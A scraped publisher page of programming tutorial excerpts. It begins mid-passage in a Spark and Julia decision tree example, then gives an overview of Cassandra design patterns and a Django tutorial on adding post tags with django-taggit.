Integer>(); String impurity = "gini"; Integer maxDepth = 5; Integer maxBins = 32; // Train a DecisionTree model for classification. final DecisionTreeModel model = DecisionTree.trainClassifier(trainingData, numClasses, categoricalFeaturesInfo, impurity, maxDepth, maxBins); // Evaluate model on test instances and compute test error JavaPairRDD<Double, Double> predictionAndLabel = testData.mapToPair(new PairFunction<LabeledPoint, Double, Double>() { @Override public Tuple2<Double, Double> call(LabeledPoint p) { return new Tuple2<Double, Double>(model.predict(p.features()), p.label()); } }); Double testErr = 1.0 * predictionAndLabel.filter(new Function<Tuple2<Double, Double>, Boolean>() { @Override public Boolean call(Tuple2<Double, Double> pl) { return !pl._1().equals(pl._2()); } }).count() / testData.count(); System.out.println("Test Error: " + testErr); System.out.println("Learned classification tree model:n" + model.toDebugString()); The Julia example We will use the DecisionTree package in Julia as shown here; julia> Pkg.add("DecisionTree")julia> using DecisionTree We will use the RDatasets package to load the dataset for the example in context; julia> Pkg.add("RDatasets"); using RDatasets julia> sales = data("datasets", "sales"); julia> features = array(sales[:, 1:4]); # use matrix() for Julia v0.2 julia> labels = array(sales[:, 5]); # use vector() for Julia v0.2 julia> stump = build_stump(labels, features); julia> print_tree(stump) Feature 3, Threshold 3.0 L-> price : 50/50 R-> shelvelock : 50/100 Pruning the tree julia> length(tree) 11 julia> pruned = prune_tree(tree, 0.9); julia> length(pruned) 9 Summary In this article, we implemented decision trees using R, Spark, and Julia. Resources for Article: Further resources on this subject: An overview of common machine learning tasks[article] How to do Machine Learning with Python[article] Modeling complex functions with artificial neural networks [article]
Read more
  • 0
  • 0
  • 37536
article-image-cassandra-design-patterns
Packt
22 Sep 2015
18 min read
Save for later

Cassandra Design Patterns

Packt
22 Sep 2015
18 min read
In this article by Rajanarayanan Thottuvaikkatumana, author of the book Cassandra Design Patterns, Second Edition, the author has discussed how Apache Cassandra is one of the most popular NoSQL data stores. He states this based on the research paper Dynamo: Amazon’s Highly Available Key-Value Store and the research paper Bigtable: A Distributed Storage System for Structured Data. Cassandra is implemented with best features from both of these research papers. In general, NoSQL data stores can be classified into the following groups: Key-value data store Column family data store Document data store Graph data store Cassandra belongs to the column family data store group. Cassandra’s peer-to-peer architecture avoids single point failures in the cluster of Cassandra nodes and gives the ability to distribute the nodes across racks or data centres. This makes Cassandra a linearly scalable data store. In other words, the more processing you need, the more Cassandra nodes you can add to your cluster. Cassandra’s multi data centre support makes it a perfect choice to replicate the data stores across data centres for disaster recovery, high availability, separating transaction processing, analytical environments, and for building resiliency into the data store infrastructure.   Design patterns in Cassandra The term “design patterns” is a highly misinterpreted term in the software development community. In an extremely general sense, it is a set of solutions for some known problems in quite a specific context. It is used in this book to describe a pattern of using certain features of Cassandra to solve some real-world problems. This book is a collection of such design patterns with real-world examples. Coexistence patterns Cassandra is one of the highly successful NoSQL data stores, which is greatly similar to the traditional RDBMS. Cassandra column families (also known as Cassandra tables), in a logical perspective, have a similarity with RDBMS-based tables in the view of the users, even though the underlying structure of these tables are totally different. Because of this, Cassandra is best fit to be deployed along with the traditional RDBMS to solve some of the problems that RDBMS is not able to handle. The caveat here is that because of the similarity of RDBMS tables and Cassandra column families in the view of the end users, many users and data modelers try to use Cassandra in the exact the same way as the RDBMS schema is being modeled, used, and getting into serious deployment issues. How do you prevent such pitfalls? The key here is to understand the differences in a theoretical perspective as well as in a practical perspective, and follow best practices prescribed by the creators of Cassandra. Where do you start with Cassandra? The best place to look at is the new application development requirements and take it from there. Look at the cases where there is a need to normalize the RDBMS tables and keep all the data items together, which would have got distributed if you were to design the same solution in RDBMS. Instead of thinking from the pure data model perspective, start thinking in terms of the application's perspective. How the data is generated by the application, what are the read requirements, what are the write requirements, what is the response time expected out of some of the use cases, and so on. Depending on these aspects, design the data model. In the big data world, the application becomes the first class citizen and the data model leaves the driving seat in the application design. Design the data model to serve the needs of the applications. In any organization, new reporting requirements come all the time. The major challenge in to generate reports is the underlying data store. In the RDBMS world, reporting is always a challenge. You may have to join multiple tables to generate even simple reports. Even though the RDBMS objects such as views, stored procedures, and indexes maybe used to get the desired data for the reports, when the report is being generated, the query plan is going to be very complex most of the time. The consumption of processing power is another need to consider when generating such reports on the fly. Because of these complexities, many times, for reporting requirements, it is common to keep separate tables containing data exported from the transactional tables. This is a great opportunity to start with NoSQL stores like Cassandra as a reporting data store. Data aggregation and summarization are common requirements in any organization. This helps to control the data growth by storing only the summary statistics and moving the transactional data into archives. Many times, this aggregated and summarized data is used for statistical analysis. Making the summary accurate and easily accessible is a big challenge. Most of the time, data aggregation and reporting goes hand in hand. The aggregated data is heavily used in reports. The aggregation process speeds up the queries to a great extent. This is another place where you can start with NoSQL stores like Cassandra. The coexistence of RDBMS and NoSQL data stores like Cassandra is very much possible, feasible, and sensible; and this is the only way to get started with the NoSQL movement, unless you embark on a totally new product development from scratch. In summary, this section of the book discusses about some design patterns related to de-normalization, reporting, and aggregation of data using Cassandra as the preferred NoSQL data store. RDBMS migration patterns A big bang approach to any kind of technology migration is not advisable. A series of deliberations have to happen before the eventual and complete change over. Migration from RDBMS to Cassandra is not different at all. Any new technology replacing an old one must coexist harmoniously, at least for a short period of time. This gives a lot of confidence on the new technology to the stakeholders. Many technology pundits give various approaches on the RDBMS to NoSQL migration strategies. Many such guidelines are specific to the particular NoSQL data stores giving attention to specific areas, and most of the time, this will end up on the process rather than the technology. The migration from RDBMS to Cassandra is not an easy task. Mainly because the RDBMS-based systems are really time tested and trust worthy in most of the organizations. So, migrating from such a robust RDBMS-based system to Cassandra is not going to be easy for anyone. One of the best approaches to achieve this goal is to exploit some of the new or unique features in Cassandra, which many of the traditional RDBMS don't have. This also prevents the usage of Cassandra just like any other RDBMS. Cassandra is unique. Cassandra is not an RDBMS. The approach of banking on the unique features is not only applicable to the RDBMS to Cassandra migration, but also to any migration from one paradigm to another. Some of the design patterns that are discussed in this section of the book revolve around very simple and important features of Cassandra, but have profound application potential when designing the next generation NoSQL data stores using Cassandra. A wise usage of these unique features in Cassandra will give a head start on the eventual and complete migration from RDBMS. The modeling of collection objects in RDBMS is a real pain, because multiple tables are to be defined and a join is required to access data. Many RDBMS offer this by providing capability to define user-defined data types, but there is absolutely no standardization at all in this space. Collection objects are very commonly seen in the real-world applications. A list of actions, tuple of related values, set of objects, dictionaries, and things like that come quite often in applications. Cassandra has elegant ways to model this because they are data types in column families. Counting is a very commonly required process in many business processes and applications. In RDBMS, this has to be modeled as integers or long numbers, but many times, applications make big mistakes in using them in wrong ways. Cassandra has a counter data type in the column family that alleviates this problem. Getting rid of unwanted records from an RDBMS table is not an automatic process. When some application events occur, they have to be removed by application programs or through some other means. But in many situations, many data items will have a preallocated time to live. They should go away without the intervention of any external events. Cassandra has a way to assign time-to-live (TTL) attribute to data items. By making use of TTL, data items get removed without any other external event's intervention. All the design patterns covered in this section of the book revolve around some of the new features of Cassandra that will make the migration from RDBMS to Cassandra an easy task. Cache migration pattern Database access whether it is from RDBMS or other highly distributed NoSQL data stores is always an input/output (I/O) intensive operation. It makes perfect sense to cache the frequently used, but reasonably static data for fast access for the applications consuming this data. In such situations, the in-memory cache is preferred to the repeated database access for each request. Using cache is not always a pleasant experience. Getting into really weird problems such as data loss, data getting out of sync with its source and other data integrity problems are very common. It is very common to see wrong components coming into the enterprise solution stack all the time for various reasons. Overlooking on some of the features and adopting the technology without much background work is a very common pitfall. Many a times, the use of cache comes into the solution stack to reduce the latency of the responses. Once the initial results are favorable, more and more data will get tossed into the cache. Slowly, this will become a practice to see that more and more data is getting into cache. Now is the time when problems start popping up one by one. Pure in-memory cache solutions are favored by everybody, by the virtue of its ability to serve the data quickly until you start loosing data. This is because of the faults in the system, along with application and node crashes. Cache serves data much faster than being served from other data stores. But if the caching solution in use is giving data integrity problems, it is better to migrate to NoSQL data stores like Cassandra. Is Cassandra faster than the in-memory caching solutions? The obvious answer is no. But it is not as bad as many think. Cassandra can be configured to serve fast reads, and bonus comes in the form of high data integrity with strong replication capabilities. Cache is good as long as it serves its purpose without any data loss or any other data integrity issues. Emphasizing on the use case of the key/value type cache and various methods of cache to NoSQL migration are discussed in this section of the book. Cassandra cannot be used as a replacement for cache in terms of the speed of data access. But when it comes to data integrity, Cassandra shines all the time with its tuneable consistency feature. With a continual tuning and manipulating data with clean and well-written application code, data access can be improved to a great level, and it will be much better than many other data stores. The design pattern covered in this section of the book gives some guidance on migrating from caching solutions to Cassandra, if this is a must. CAP patterns When it comes to large-scale Internet applications or web services, popularly known as the Internet of Things (IoT) applications, the number of components are huge and the way they are distributed is beyond imagination. There will be hundreds of application servers, hundreds of data store nodes, and many other components in the whole ecosystem. In such a scenario, for doing an atomic transaction by getting an agreement from all the components involved is, for all practical purposes, impossible. Consistency, availability, and partition tolerance are three important guarantees, popularly known as CAP guarantees that any distributed computing systems should offer even though all is not possible simultaneously. In the IoT applications, the distribution of the application nodes is unavoidable. This means that the possibility of network partition is pretty much there. So, it is mandatory to give the P guarantee. Now, the question is whether to forfeit the C guarantee or the A guarantee. At this stage, the situation is not as grave as portrayed in the CAP Theorem conjectured by Eric Brewer. For all the use cases in a given IoT application, there is no need of having 100% of C guarantee and 100% of A guarantee. So, depending on the need of the level of A guarantee, the C guarantee can be tuned. In other words, it is called tunable consistency. Depending on the way data is ingested into Cassandra, and the way it is consumed from Cassandra, tuning is possible to give best results for the appropriate read and write requirements of the applications. In some applications, the speed at which the data is written will be very high. In other words, the velocity of the data ingestion into Cassandra is very high. This falls into the write-heavy applications. In some applications, the need to read data quickly will be an important requirement. This is mainly needed in the applications where there is a lot of data processing required. Data analytics applications, batch processing applications, and so on fall under this category. These fall into the read-heavy applications. Now, there is a third category of applications where there is an equal importance for fast writes as well as fast reads. These are the kind of applications where there is a constant inflow of data, and at the same time, there is a need to read the data by clients for various purposes. This falls into the read-write balanced applications. The consistency level requirements for all the previous three types of applications are totally different. There is no one way to tune so that it is optimal for all the three types of applications. All the three applications' consistency levels are to be tuned differently from use case to use case. In this section of the book, various design patterns related to applications with the needs of fast writes, fast reads, and moderate write and read are discussed. All these design patterns revolve around using the tuneable consistency parameters of Cassandra. Whether it is for write or read and if the consistency levels are set high, the availability levels will be low and vice versa. So, by making use of the consistency level knob, the Cassandra data store can be used for various types of writing and reading use cases. Temporal patterns In any applications, the usage of data that varies over the period of time is called as temporal data, which is very important. Temporal data is needed wherever there is a need to maintain chronology. There are so many applications in which there is a huge need for storage, retrieval, and processing of data that is tied to time. The biggest challenge in dealing with temporal data stored in a data store is that they are hugely used for analytical purposes and retrieving the data, based on various sort orders in terms of time. So, the data stores that are used to capture the temporal data should be capable of storing the data strictly adhering to the chronology. There are so many usage patterns that are seen in the real world that fall into showing temporal behavior. For the classification purpose in this book, they are bucketed into three. The first one is the general time series category. The second one is the log category, such as in an audit log, a transaction log, and so on. The third one is the conversation category, such as in the conversation messages of a chat application. There is relevance in this classification, because these are commonly used across in many of the applications. In many of the applications, these are really cross cutting concerns; and designers underestimate this aspect; and finally, many of the applications will have different data stores capturing this temporal data. There is a need to have a common strategy dealing with temporal data that fall in these three commonly seen categories in an enterprise wide solution architecture. In other words, there should be a uniform way of capturing temporal data; there should be a uniform way of processing temporal data; and there should be a commonly used set of tools and libraries to manage the temporal data. Out of the three design patterns that are discussed in this section of the book, the first Time Series pattern is a general design pattern that covers the most general behavior of any kind of temporal data. The next two design patterns namely Log pattern and Conversation pattern are two special cases of the first design pattern. This section of the book covers the general nature of temporal data, some specific instances of such data items in the real-world applications, and why Cassandra is the best fit as a NoSQL data store to persist the temporal data. Temporal data comes quite often in many use cases of lots of applications. Data modeling of temporal data is very important in the Cassandra perspective for optimal storage and quick access of the data. Some common design patterns to model temporal data have been covered in this section of the book. By focusing on some very few aspects, such as the partition key, primary key, clustering column and the number of records that gets stored in a wide row of Cassandra, very effective and high performing temporal data models can be built. Analytical patterns The 3Vs of big data namely Volume, Variety, and Velocity pose another big challenge, which is the analysis of the data stored in NoSQL data stores, such as Cassandra. What are the analytics use cases? How can the distributed data be processed? What are the data transformations that are typically seen in the applications? These are the topics covered in this section of the book. Unlike other sections of this book, the focus is shifted from Cassandra to other technologies like Apache Hadoop, Hadoop MapReduce, and Apache Spark to introduce the big data analytics tool space. The design patterns such as Map/Reduce Pattern and Transformation Pattern are very commonly seen in the data analytics world. Cassandra with Apache Spark has good compatibility, and is a very ideal tool set in the data analysis use cases. This section of the book covers some data analysis aspects and mainly discusses about data processing. Data transformation is one of the major activity in data processing. Out of the many data processing patterns, Map/Reduce Pattern deserves a special mention, because it is being used in so many batch processing and analysis use cases, dealing with big data. Spark has been chosen as the tool of choice to explain the data processing activities. This section explains how a Map/Reduce kind of data processing task can be done using Cassandra. Spark has also been discussed, which is very powerful to perform online data analysis. This section of the book also covers some of the commonly seen data transformations that are used in the data processing applications. Summary Many Cassandra design patterns have been covered in this book. If the design patterns are not being used in any real-world applications, it has only theoretical value. To give a practical approach to the applicability of these design patterns, an end-to-end application is taken as a case point and described as the last chapter of the book, which is used as a vehicle to explain the applicability of the Cassandra design patterns discussed in the earlier sections of the book. Users love Cassandra because of its SQL-like interface CQL. Also, its features are very closely related to the RDBMS even though the paradigm is totally new. Application developers love Cassandra because of the plethora of drivers available in the market so that they can write applications in their preferred programming language. Architects love Cassandra because they can store structured, semi-structured, and unstructured data in it. Database administers love Cassandra because it comes with almost no maintenance overhead. Service managers love Cassandra because of the wonderful monitoring tools available in the market. CIOs love Cassandra because it gives value for their money. And Cassandra works! An application based on Cassandra will be perfect only if its features are used in the right way, and this book is an attempt to guide the Cassandra community in this direction. Resources for Article: Further resources on this subject: Cassandra Architecture [article] Getting Up and Running with Cassandra [article] Getting Started with Apache Cassandra [article]
Read more
  • 0
  • 0
  • 12821

article-image-enhancing-your-blog-advanced-features
Packt
22 Sep 2015
8 min read
Save for later

Enhancing Your Blog with Advanced Features

Packt
22 Sep 2015
8 min read
In this article by Antonio Melé, the author of the Django by Example book shows how to use the Django forms, and ModelForms. You will let your users share posts by e-mail, and you will be able to extend your blog application with a comment system. You will also learn how to integrate third-party applications into your project, and build complex QuerySets to get useful information from your models. In this article, you will learn how to add tagging functionality using a third-party application. (For more resources related to this topic, see here.) Adding tagging functionality After implementing our comment system, we are going to create a system for adding tags to our posts. We are going to do this by integrating in our project a third-party Django tagging application. django-taggit is a reusable application that primarily offers you a Tag model, and a manager for easily adding tags to any model. You can take a look at its source code at https://github.com/alex/django-taggit. First, you need install django-taggit via pip by running the pip install django-taggit command. Then, open the settings.py file of the project, and add taggit to your INSTALLED_APPS setting as the following: INSTALLED_APPS = ( # ... 'mysite.blog', 'taggit', ) Then, open the models.py file of your blog application, and add to the Post model the TaggableManager manager, provided by django-taggit as the following: from taggit.managers import TaggableManager # ... class Post(models.Model): # ... tags = TaggableManager() You just added tags for this model. The tags manager will allow you to add, retrieve, and remove tags from the Post objects. Run the python manage.py makemigrations blog command to create a migration for your model changes. You will get the following output: Migrations for 'blog': 0003_post_tags.py: Add field tags to post Now, run the python manage.py migrate command to create the required database tables for django-taggit models and synchronize your model changes. You will see an output indicating that the migrations have been applied: Operations to perform: Apply all migrations: taggit, admin, blog, contenttypes, sessions, auth Running migrations: Applying taggit.0001_initial... OK Applying blog.0003_post_tags... OK Your database is now ready to use django-taggit models. Open the terminal with the python manage.py shell command, and learn how to use the tags manager. First, we retrieve one of our posts (the one with the ID as 1): >>> from mysite.blog.models import Post >>> post = Post.objects.get(id=1) Then, add some tags to it and retrieve its tags back to check that they were successfully added: >>> post.tags.add('music', 'jazz', 'django') >>> post.tags.all() [<Tag: jazz>, <Tag: django>, <Tag: music>] Finally, remove a tag and check the list of tags again: >>> post.tags.remove('django') >>> post.tags.all() [<Tag: jazz>, <Tag: music>] This was easy, right? Run the python manage.py runserver command to start the development server again, and open http://127.0.0.1:8000/admin/taggit/tag/ in your browser. You will see the admin page with the list of the Tag objects of the taggit application: Navigate to http://127.0.0.1:8000/admin/blog/post/ and click on a post to edit it. You will see that the posts now include a new Tags field as the following one where you can easily edit tags: Now, we are going to edit our blog posts to display the tags. Open the blog/post/list.html template and add the following HTML code below the post title: <p class="tags">Tags: {{ post.tags.all|join:", " }}</p> The join template filter works as the Python string join method to concatenate elements with the given string. Open http://127.0.0.1:8000/blog/ in your browser. You will see the list of tags under each post title: Now, we are going to edit our post_list view to let users see all posts tagged with a tag. Open the views.py file of your blog application, import the Tag model form django-taggit, and change the post_list view to optionally filter posts by tag as the following: from taggit.models import Tag def post_list(request, tag_slug=None): post_list = Post.published.all() if tag_slug: tag = get_object_or_404(Tag, slug=tag_slug) post_list = post_list.filter(tags__in=[tag]) # ... The view now takes an optional tag_slug parameter that has a None default value. This parameter will come in the URL. Inside the view, we build the initial QuerySet, retrieving all the published posts. If there is a given tag slug, we get the Tag object with the given slug using the get_object_or_404 shortcut. Then, we filter the list of posts by the ones which tags are contained in a given list composed only by the tag we are interested in. Remember that QuerySets are lazy. The QuerySet for retrieving posts will only be evaluated when we loop over the post list to render the template. Now, change the render function at the bottom of the view to pass all the local variables to the template using locals(). The view will finally look as the following: def post_list(request, tag_slug=None): post_list = Post.published.all() if tag_slug: tag = get_object_or_404(Tag, slug=tag_slug) post_list = post_list.filter(tags__in=[tag]) paginator = Paginator(post_list, 3) # 3 posts in each page page = request.GET.get('page') try: posts = paginator.page(page) except PageNotAnInteger: # If page is not an integer deliver the first page posts = paginator.page(1) except EmptyPage: # If page is out of range deliver last page of results posts = paginator.page(paginator.num_pages) return render(request, 'blog/post/list.html', locals()) Now, open the urls.py file of your blog application, and make sure you are using the following URL pattern for the post_list view: url(r'^$', post_list, name='post_list'), Now, add another URL pattern as the following one for listing posts by tag: url(r'^tag/(?P<tag_slug>[-w]+)/$', post_list, name='post_list_by_tag'), As you can see, both the patterns point to the same view, but we are naming them differently. The first pattern will call the post_list view without any optional parameters, whereas the second pattern will call the view with the tag_slug parameter. Let’s change our post list template to display posts tagged with a specific tag, and also link the tags to the list of posts filtered by this tag. Open blog/post/list.html and add the following lines before the for loop of posts: {% if tag %} <h2>Posts tagged with "{{ tag.name }}"</h2> {% endif %} If the user is accessing the blog, he will the list of all posts. If he is filtering by posts tagged with a specific tag, he will see this information. Now, change the way the tags are displayed into the following: <p class="tags"> Tags: {% for tag in post.tags.all %} <a href="{% url "blog:post_list_by_tag" tag.slug %}">{{ tag.name }}</a> {% if not forloop.last %}, {% endif %} {% endfor %} </p> Notice that now we are looping through all the tags of a post, and displaying a custom link to the URL for listing posts tagged with this tag. We build the link with {% url "blog:post_list_by_tag" tag.slug %} using the name that we gave to the URL, and the tag slug as parameter. We separate the tags by commas. The complete code of your template will look like the following: {% extends "blog/base.html" %} {% block title %}My Blog{% endblock %} {% block content %} <h1>My Blog</h1> {% if tag %} <h2>Posts tagged with "{{ tag.name }}"</h2> {% endif %} {% for post in posts %} <h2><a href="{{ post.get_absolute_url }}">{{ post.title }}</a></h2> <p class="tags"> Tags: {% for tag in post.tags.all %} <a href="{% url "blog:post_list_by_tag" tag.slug %}">{{ tag.name }}</a> {% if not forloop.last %}, {% endif %} {% endfor %} </p> <p class="date">Published {{ post.publish }} by {{ post.author }}</p> {{ post.body|truncatewords:30|linebreaks }} {% endfor %} {% include "pagination.html" with page=posts %} {% endblock %} Open http://127.0.0.1:8000/blog/ in your browser, and click on any tag link. You will see the list of posts filtered by this tag as the following: Summary In this article, you added tagging to your blog posts by integrating a reusable application. The book Django By Example, hands-on-guide will also show you how to integrate other popular technologies with Django in a fun and practical way. Resources for Article: Further resources on this subject: Code Style in Django[article] So, what is Django? [article] Share and Share Alike [article]
Read more
  • 0
  • 0
  • 4402
Modal Close icon
Modal Close icon